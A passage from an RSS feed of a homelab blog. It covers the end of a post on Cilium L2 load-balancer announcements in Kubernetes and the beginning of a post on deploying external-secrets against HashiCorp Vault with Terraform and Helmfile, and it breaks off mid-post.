<p>First, a <code>CiliumLoadBalancerIPPool</code> manifest needs to be deployed. This manifest
controls the pools of IPs which are handed out to <code>LoadBalancer</code> type services.
In my setup, the manifest looks something like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2alpha1&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumLoadBalancerIPPool</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cilium-lb-ipam</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">kube-system</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">cidrs</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">cidr</span>: <span style="color:#e6db74">&#34;10.86.5.80/28&#34;</span>
</span></span></code></pre></div><p>It defines a relatively small IP range, as I don&rsquo;t expect to expose too many
services. Most of what I will expose will run through the ingress service.
Documentation on the pools and additional options can be found <a href="https://docs.cilium.io/en/stable/network/lb-ipam/">here</a>.</p>
<h2 id="l2-announcement-policies">L2 announcement policies</h2>
<p>The second piece of config is the configuration for which services should get
an IP and which nodes should do the L2 announcements. This is done via a
<code>CiliumL2AnnouncementPolicy</code> manifest, which is documented <a href="https://docs.cilium.io/en/latest/network/l2-announcements/">here</a>.</p>
<p>For me, the config looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2alpha1&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumL2AnnouncementPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">cilium-lb-all-services</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">kube-system</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">nodeSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/role</span>: <span style="color:#ae81ff">worker</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/public-service</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">loadBalancerIPs</span>: <span style="color:#66d9ef">true</span>
</span></span></code></pre></div><p>This restricts the announcements to only happen from my worker nodes, not from
the control plane or Ceph nodes.</p>
<p>In addition, I&rsquo;m adding a <code>serviceSelector</code> here, so that only certain services
get an IP and are announced. This is necessary due to <a href="https://github.com/cilium/cilium/issues/28752">this bug</a>.
The bug leads to all services being considered for L2 announcements, regardless
of whether they are of type <code>LoadBalancer</code> or not. This doesn&rsquo;t make much
sense at all, and also costs performance, which I will go into in a later section.</p>
<h1 id="example">Example</h1>
<p>With all of that config done, let&rsquo;s have a look at an example. I used the
following deployment:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">testsetup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">app</span>: <span style="color:#ae81ff">testsetup</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">app</span>: <span style="color:#ae81ff">testsetup</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">echo-server</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">jmalloc/echo-server</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">http-port</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: <span style="color:#ae81ff">8080</span>
</span></span></code></pre></div><p>This is just a simple echo server which returns a bit of information on the
HTTP request it received.
Then this is the service for exposing that pod:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">testsetup-service</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/public-service</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/hostname</span>: <span style="color:#ae81ff">testsetup.example.com</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">LoadBalancer</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">app</span>: <span style="color:#ae81ff">testsetup</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">http-port</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">port</span>: <span style="color:#ae81ff">80</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">targetPort</span>: <span style="color:#ae81ff">http-port</span>
</span></span></code></pre></div><p>As noted above, only services with the <code>homelab/public-service=&quot;true&quot;</code> label
are handled by the Cilium L2 announcements. In addition, I&rsquo;m supplying the
service with an external-dns hostname to get an automated DNS entry.
In short, any requests which reach the service IP on port <code>80</code> are forwarded
to port <code>8080</code> in the pod, which is where the <code>echo-server</code> is listening.</p>
<p>One very important thing to note: Use <strong>curl</strong> for testing! Ping won&rsquo;t work,
as the service IP does not answer to <code>ping</code>.
When starting to debug, first check whether the service got an IP assigned:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl get -n testsetup service
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>NAME                TYPE           CLUSTER-IP     EXTERNAL-IP   PORT<span style="color:#f92672">(</span>S<span style="color:#f92672">)</span>        AGE
</span></span><span style="display:flex;"><span>testsetup-service   LoadBalancer   10.7.174.128   10.86.5.93    80:32206/TCP   14h
</span></span></code></pre></div><p>The important part here is the <code>EXTERNAL_IP</code>.
Next, check whether there is a Kubernetes lease created by anyone , signaling
that the node is announcing the service:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>kubectl get -n kube-system leases.coordination.k8s.io
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>NAME                                            HOLDER       AGE
</span></span><span style="display:flex;"><span>cilium-l2announce-testsetup-testsetup-service   sehith       13h
</span></span></code></pre></div><p>You can also use <code>arping</code> to check whether there&rsquo;s anyone announcing the IP:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>arping 10.86.5.93
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#ae81ff">58</span> bytes from 00:16:3e:17:a4:31 <span style="color:#f92672">(</span>10.86.5.93<span style="color:#f92672">)</span>: index<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> time<span style="color:#f92672">=</span>253.747 usec
</span></span></code></pre></div><p>Important to note: <code>arping</code> will only work from within the same subnet, as ARP
is a layer 2 protocol. Ask me how much time I spend trying to figure out why
I didn&rsquo;t get an answer on an <code>arping</code> from a separate subnet. &#x1f609;</p>
<h1 id="performance">Performance</h1>
<p>One last point I&rsquo;ve got to bring up is the efficiency of Cilium&rsquo;s L2 load
balancer approach.</p>
<p>As noted, <a href="https://github.com/cilium/cilium/issues/28752">this bug</a> made
Cilium announce every service in my cluster initially, <code>type=LoadBalancer</code> or
not.</p>
<p>This produced quite a high load increase on one of my control plane nodes:</p>
<figure>
    <img loading="lazy" src="control_load.png"
         alt="A screenshot of a Grafana plot, titled &#39;CPU Utilization&#39;. The y axis shows CPU utilization in percent, going from 82% at the bottom to 100% at the top. The x axis shows time, from 21:05 to 23:10. At the beginning, the plot shows about 89% idle load for the CPU. At around 21:20, the idle load is reduced to about 87% idle. This level of load is held until about 23:03, when the idle load increases back to about 88%."/> <figcaption>
            <p>L2 announcements were enabled for the first time around 21:20. At around 23:03, I reduced the L2 announcements to a single service, instead of 5.</p>
        </figcaption>
</figure>

<p>The CPU load on this 4 core control node was increased by about 2% during the time
where Cilium had to announce the 5 services I had defined in my cluster.
This is most likely all API server/etcd load, as Cilium uses Kubernetes'
<a href="https://kubernetes.io/docs/concepts/architecture/leases/">leases</a> functionality.
For every L2 announcement, all nodes continuously check whether the current lease
holder is still holding the lease, so that another node can take over if the
one which previously did the announcement for the service failed for some reason.</p>
<p>This 2% load increase was from only five services with three nodes in the cluster.
My cluster will very likely end up with 9 worker nodes in the end, and possibly
more than 5 services. I really don&rsquo;t like where that might lead.</p>
<p>I will have to keep my eye on this while I migrate more hosts and services over
from Nomad. If it gets too bad, I will have to return to this topic and try out
MetalLB, or potentially go ahead and have a look at BGP after all.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 1: Setting up external-secrets</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-1-external-secrets/</link>
      <pubDate>Tue, 26 Dec 2023 17:29:59 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-1-external-secrets/</guid>
      <description>My setup for external-secrets with HashiCorp Vault</description>
      <content:encoded><![CDATA[<p>This is the second post in my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>I will skip the cluster setup itself in this series, as I did not make many
changes compared to my <a href="https://blog.mei-home.net/posts/kubernetes-cluster-setup/">experimental setup</a>.</p>
<p>Instead I will start with my very first deployed service, <a href="https://external-secrets.io/latest/">external-secrets</a>.</p>
<h1 id="motivation">Motivation</h1>
<p>In my initial experimentation, I decided to not go with any secrets management
and instead use <a href="https://helmfile.readthedocs.io/en/latest/remote-secrets/#remote-secrets">Helmfile&rsquo;s secret handling</a>.
But I&rsquo;ve come around to the fact that having some sort of service which can
automatically take in secrets from my <a href="https://www.vaultproject.io/">Vault</a>
instance would be pretty nice to have.
One trigger was the fact that while setting up a number of services, I found
that Helmfile&rsquo;s approach for getting secrets was not actually that great.</p>
<p>So what does external-secrets do? It is a connector between Kubernetes Secrets
and an external secrets provider. In my case, that&rsquo;s HashiCorp&rsquo;s Vault.
With external-secrets, an operator is set up. This operator watches for new
objects of type <code>ExternalSecret</code>. When one of those appears, it reads the
object&rsquo;s values and contacts Vault to download the secrets. Then, external-secrets
creates a new Kubernetes Secret with that secret matter collected from the
external secrets provider for use in the Kubernetes cluster.</p>
<h1 id="vault-setup">Vault setup</h1>
<p>Before I could deploy external-secrets, I had to do some reconfiguration of my
Vault setup. I&rsquo;m managing all of the setup for Vault in Terraform.</p>
<p>The first step was creating a rather restrictive policy for the external-secrets
access, as my Vault doesn&rsquo;t just provide secrets for my workloads, but also for
my Ansible playbooks and image generation setup. For now, I&rsquo;m planning to
restrict access to just the <a href="https://developer.hashicorp.com/vault/docs/secrets/kv/kv-v1">Vault kv secrets store</a>,
and only particular paths therein.
A policy for that might look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">path</span> <span style="color:#e6db74">&#34;secret/my_kubernetes_secrets/cluster/*&#34;</span> {
</span></span><span style="display:flex;"><span>  capabilities <span style="color:#f92672">=</span> [ <span style="color:#e6db74">&#34;read&#34;</span> ]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>With that, if my k8s cluster ever gets breached, the attacker will at most have
access to the Kubernetes specific secrets.
This policy is then added to Vault via Terraform like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;vault_policy&#34; &#34;external-secrets&#34;</span> {
</span></span><span style="display:flex;"><span>  name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;external-secrets&#34;</span>
</span></span><span style="display:flex;"><span>  policy <span style="color:#f92672">=</span> <span style="color:#66d9ef">file</span>(<span style="color:#e6db74">&#34;path-to-file.hcl&#34;</span>)
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Policies as short as this could also be added verbatim instead of having a
separate file and loading that, but I like it better like this.</p>
<p>The second part of the Vault setup is the authentication. For this I chose
Vault&rsquo;s <a href="https://developer.hashicorp.com/vault/docs/auth/approle">AppRole</a>,
which is intended for use cases exactly like this. I did not actually have that
auth backend configured yet, so I added it like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;vault_auth_backend&#34; &#34;approle&#34;</span> {
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;approle&#34;</span>
</span></span><span style="display:flex;"><span>  path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;approle&#34;</span>
</span></span><span style="display:flex;"><span>  local <span style="color:#f92672">=</span> <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>I just kept the default mount path. In addition to mounting the backend, I also
needed to create a role for external-secrets. For my setup, it looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">resource</span> <span style="color:#e6db74">&#34;vault_approle_auth_backend_role&#34; &#34;external-secrets&#34;</span> {
</span></span><span style="display:flex;"><span>  backend <span style="color:#f92672">=</span> <span style="color:#66d9ef">vault_auth_backend</span>.<span style="color:#66d9ef">approle</span>.<span style="color:#66d9ef">path</span>
</span></span><span style="display:flex;"><span>  role_name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;external-secrets&#34;</span>
</span></span><span style="display:flex;"><span>  token_policies <span style="color:#f92672">=</span> [<span style="color:#66d9ef">vault_policy</span>.<span style="color:#66d9ef">external</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">secrets</span>.<span style="color:#66d9ef">name</span>]
</span></span><span style="display:flex;"><span>  secret_id_bound_cidrs <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;10.1.1.0/24&#34;</span>]
</span></span><span style="display:flex;"><span>  token_bound_cidrs <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;10.1.1.0/24&#34;</span>]
</span></span><span style="display:flex;"><span>  token_explicit_max_ttl <span style="color:#f92672">=</span> <span style="color:#ae81ff">86400</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>This creates an application role with the previously created access policy and
the default policy attached. The default policy just allows things like looking
up your own token but doesn&rsquo;t grant any secret access.
For additional security, I also configured restricted CIDRs for both the
<code>secret-id</code>, which is used to log in, and the tokens produced for the role after
login. This restricts the IPs from which logins can happen and after that
restricts the IPs from which the generated tokens can be used.
For purely best practices reasons, I also restricted the max TTL for tokens
created for this role to 24h.</p>
<p>What I did decide to not do here was to also set a TTL for the <code>secret_id</code>. This
is due to the fact that while external-secrets can renew tokens if they become
invalid, it cannot automatically get a new <code>secret_id</code>. So I&rsquo;ve added the
<code>secret_id</code> to my regular manual secrets rotation plan. I definitely need to
write a playbook or script to do all of those rotations at some point. &#x1f62c;</p>
<p>Once all of the above has been configured and Terraform has been executed,
there are two pieces of information needed to configure external-secrets.
The first one is the AppRole <code>role-id</code>. It can be collected via this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>vault read auth/approle/role/external-secrets/role-id
</span></span></code></pre></div><p>The second piece is the <code>secret_id</code>. A fresh one is generated and shown every
time the following Vault command is executed:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>vault write -force auth/approle/role/external-secrets/secret-id
</span></span></code></pre></div><p>The <code>-force</code> is required here because normally Vault needs at least some input
parameters, but in this case I didn&rsquo;t need any.</p>
<p>Finally, I stored the <code>secret_id</code> in the Vault KV store for later access by
my external-secrets deployment:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>vault kv put secret/my_kubernetes_secrets/role-secret secret-id<span style="color:#f92672">=</span>-
</span></span></code></pre></div><p>In theory, I could also have gotten the <code>secret_id</code> via Terraform and then
written it to the KV store also via Terraform. But that would have meant that
the <code>secret_id</code> would have ended up in the Terraform state. Not optimal.</p>
<h1 id="kubernetes-deployment">Kubernetes deployment</h1>
<p>With all of the Vault config now prepared, the next step is to actually deploy
external-secrets. And this went relatively well. I used the
<a href="https://github.com/external-secrets/external-secrets/tree/main/deploy/charts/external-secrets">official Helm chart</a>.</p>
<p>I&rsquo;m using <a href="https://github.com/helmfile/helmfile">Helmfile</a> for managing the
deployments in my Kubernetes cluster. I will not go into the details here, but
I&rsquo;ve got a draft for a post on my deployment setup almost done and will finish
it after this post.</p>
<p>My <code>values.yaml</code> file for the Helm chart looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">approleSecretId</span>: {{ <span style="color:#e6db74">&#34;ref+vault://secret/my_kubernetes_secrets/role-secret#/secret-id&#34;</span> <span style="color:#ae81ff">| fetchSecretValue }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">approleId</span>: {{ <span style="color:#e6db74">&#34;ref+vault://auth/approle/role/external-secrets/role-id#/role_id&#34;</span> <span style="color:#ae81ff">| fetchSecretValue }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">caBundle</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">  {{- exec &#34;curl&#34; (list &#34;https://vault.example.com:/v1/my-ca/ca/pem&#34;) | nindent 2 }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">external-secrets</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">commonLabels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">external-secrets</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceMonitor</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">webhook</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">certManager</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>The <code>ref+vault</code> syntax uses <a href="https://helmfile.readthedocs.io/en/latest/remote-secrets/">Helmfile&rsquo;s secret management</a>
to get the AppRole credentials from my Vault instance during deployment.
The <code>caBundle</code> value will later be used to supply the SecretStore with my
internal CA so external-secrets can validate the TLS cert coming from my Vault
instance. I will go over this in detail later.</p>
<p>The values under <code>external-secrets</code> are the actual values for the external-secrets
Helm chart, as that chart is managed as a dependency.
I&rsquo;m not doing anything special here, just explicitly disabling the <code>serviceMonitor</code>.
This is mostly so that I can later grep over my Homelab repo and find all apps
providing service monitors once I&rsquo;ve deployed Prometheus.</p>
<h1 id="enabling-the-vault-secrets-store">Enabling the Vault secrets store</h1>
<p>In external-secrets, the different supported secrets providers can be enabled
separately via <code>SecretStore</code> or <code>ClusterSecretStore</code> manifests. I decided to
use the <code>ClusterSecretStore</code>, as providing per-namespace stores didn&rsquo;t look
like they would make much sense.
My thinking here is that yes, I could provide one store per namespace, which
would mean one store per deployed app. I could then create different roles for
each of these stores in Vault and give them highly restrictive policies to only
access what they really need.</p>
<p>But in Kubernetes, it&rsquo;s not the pods themselves which have access to the
Secrets and the secrets stores. It&rsquo;s the admins and operators which create and
write manifests. In the case of this cluster, that&rsquo;s only me. And I&rsquo;ve already
got all the permissions there are. So if somebody were to get into my Kubernetes
account, they would have access to anything anyway. So it didn&rsquo;t make much sense
to me to work with different secret stores.</p>
<p>Without further delay, here is my <code>ClusterSecretStore</code> manifest:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ClusterSecretStore</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-vault-store</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">provider</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">vault</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">server</span>: <span style="color:#e6db74">&#34;https://vault.example.com&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">caProvider</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">type</span>: <span style="color:#ae81ff">Secret</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-internal-ca</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">external-secrets</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">caCert</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;secret&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">version</span>: <span style="color:#e6db74">&#34;v1&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">auth</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">appRole</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;approle&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#75715e"># RoleID configured in the App Role authentication backend</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">roleId</span>: {{ <span style="color:#ae81ff">.Values.approleId }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#75715e"># Reference to a key in a K8 Secret that contains the App Role SecretId</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">secretRef</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;my-approle-secret&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">namespace</span>: {{ <span style="color:#ae81ff">.Release.Namespace }}</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;secretId&#34;</span>
</span></span></code></pre></div><p>In addition to this, I&rsquo;m also deploying two more secrets, one for my internal
CA and one with the AppRole <code>secret_id</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Secret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-approle-secret</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">external-secrets</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secretId</span>: {{ <span style="color:#ae81ff">.Values.approleSecretId | b64enc }}</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Secret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-internal-ca</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">stringData</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">caCert</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    {{- .Values.caBundle | nindent 6 }}</span>
</span></span></code></pre></div><p>These are getting their values from the following lines in the <code>values.yaml.gotmpl</code>
file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">approleSecretId</span>: {{ <span style="color:#e6db74">&#34;ref+vault://secret/my_kubernetes_secrets/role-secret#/secret-id&#34;</span> <span style="color:#ae81ff">| fetchSecretValue }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">caBundle</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">  {{- exec &#34;curl&#34; (list &#34;https://vault.example.com:/v1/my-ca/ca/pem&#34;) | nindent 2 }}</span>
</span></span></code></pre></div><p>As mentioned before, I&rsquo;m using Helmfile&rsquo;s templating capabilities here. If
you&rsquo;re not using Helmfile, you will have to get the secrets created in a different
way.
For me, this approach has the advantage of having absolutely everything under
version control while not exposing any secrets.</p>
<p>While trying to deploy the <code>ClusterSecretStore</code>, I hit two problems I will
describe in detail in a later section.</p>
<p>For now, the above config works.</p>
<h1 id="deploying-a-secret">Deploying a secret</h1>
<p>To test the setup, I created a fresh dummy secret in Vault. First, I pushed
the secret to Vault:</p>
